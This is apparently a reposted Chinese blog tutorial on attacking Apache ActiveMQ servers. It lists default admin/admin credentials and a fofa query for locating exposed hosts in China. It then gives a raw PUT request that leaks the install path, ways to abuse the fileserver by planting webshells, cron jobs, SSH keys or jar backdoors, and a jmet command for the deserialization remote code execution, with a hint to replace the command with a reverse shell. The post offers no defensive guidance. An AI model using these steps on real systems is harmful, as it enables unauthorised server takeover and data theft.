ActiveMQ是一款流行的開源訊息服務器,默認情況下,ActiveMQ服務是沒有配置安全引數,惡意人員可以利用默認配置弱點發動遠程命令執行攻擊,獲取服務器權限,從而導致資料泄露,
一、未授權訪問
默認埠:8161
401默認密碼:admin/admin
fofa:body="ActiveMQ"&&port=8161&&country=CN
默認密碼admin/admin
二、ActiveMQ物理路徑泄漏漏洞
ActiveMQ默認開啟PUT請求,當開啟PUT時,構造好Payload(/fileserver/a../../%08/..%08/.%08/%08)(即不存在的目錄),Response會回傳相應的物理路徑資訊:
Request Raw:
PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1
Host: 192.168.197.25:8161
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 4
test
Response Raw:
HTTP/1.1 500 /data/apache-activemq-5.7.0/webapps/fileserver//.././(No such file or directory)
Content-Length: 0
Server: Jetty(7.6.7.v20120910)
三、檔案上傳
背景介紹:
ActiveMQ的web控制臺分三個應用,admin、api和fileserver,其中admin是管理員頁面,api是介面,fileserver是儲存檔案的介面;admin和api都需要登錄后才能使用,fileserver無需登錄,
fileserver是一個RESTful API介面,我們可以通過GET、PUT、DELETE等HTTP請求對其中存盤的檔案進行讀寫操作,其設計目的是為了彌補訊息佇列操作不能傳輸、存盤二進制檔案的缺陷,
使用條件:
ActiveMQ在5.12.x~5.13.x版本中,已經默認關閉了fileserver這個應用(你可以在conf/jetty.xml中開啟之);在5.14.0版本以后,徹底洗掉了fileserver應用,
fileserver支持寫入檔案(但不決議jsp),同時支持移動檔案(MOVE請求),
寫入的方法:
- 寫入webshell(方便快捷、但需要登錄admin和api兩個應用,并且不決議jsp)
- 寫入cron或ssh key等檔案(可直接反彈shell,但需root權限)
- 寫入jar或jetty.xml等庫和組態檔(寫入jar需要jar后門,寫入xml組態檔需要adctivemq的絕對路徑)
四、反序列化
影響范圍:Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞
原理:該漏洞源于程式沒有限制可在代理中序列化的類,遠程攻擊者可借助特制的序列化的Java Message Service(JMS)ObjectMessage物件利用該漏洞執行任意代碼,
默認埠:61616
web埠:8161
exp:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "yourcommand" -Yp ROME your-ip 61616
使用jmet進行漏洞利用,首先下載jmet的jar檔案,并在同目錄下創建一個external檔案夾(否則可能會爆檔案夾不存在的錯誤)
此時會給目標ActiveMQ添加一個名為event的佇列,我們可以通過http://your-ip:8161/admin/browse.jsp?JMSDestination=event看到這個佇列中所有訊息:
當管理員點擊查看訊息后,命令執行成功,
可將command換成反彈shell陳述句,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/30894.html
標籤:其他
上一篇:手機抓包方法
下一篇:淺談SIEM